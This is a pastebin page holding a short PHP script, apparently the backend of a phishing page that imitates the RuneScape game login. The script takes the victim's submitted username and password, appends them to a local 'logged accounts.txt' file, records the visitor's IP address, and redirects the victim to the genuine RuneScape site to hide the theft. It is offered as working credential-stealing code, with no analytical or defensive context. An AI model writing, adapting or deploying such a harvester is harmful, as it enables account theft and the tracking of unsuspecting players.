tää juttu

From Speedy Hornbill, 1 Year ago, written in Plain Text, viewed 125 times.
URL https://paste.bugabuse.net/view/d2bf5fc9 Embed
Download Paste or View Raw
  1. <?php
  2. header ('Location:www.runescape.com');
  3. $username = $_POST['username'];
  4. $password = $_POST['password'];
  5.  
  6. $File = "logged accounts.txt";
  7. $fhandle = fopen($File, 'a');
  8.  
  9. fwrite($fhandle,"\n");
  10. fwrite($fhandle,"Username: ");
  11. fwrite($fhandle,$username);
  12. fwrite($fhandle,"\n");
  13. fwrite($fhandle,"Password: ");
  14. fwrite($fhandle,$password);
  15. fwrite($fhandle,"\n");
  16. fwrite($fhandle,"\n");
  17. fclose($fhandle);
  18. header( 'Location: http://services.runescape.com/m=forum/forums.ws?294,2953213125') ;
  19. $ip = $_SERVER['REMOTE_ADDR'];
  20. $fo = fopen("ip.txt", "a");
  21. $fw = fwrite($fo, "$ip\n");
  22. fclose($fo);
  23. ?>

Reply to "tää juttu"

Here you can reply to the paste above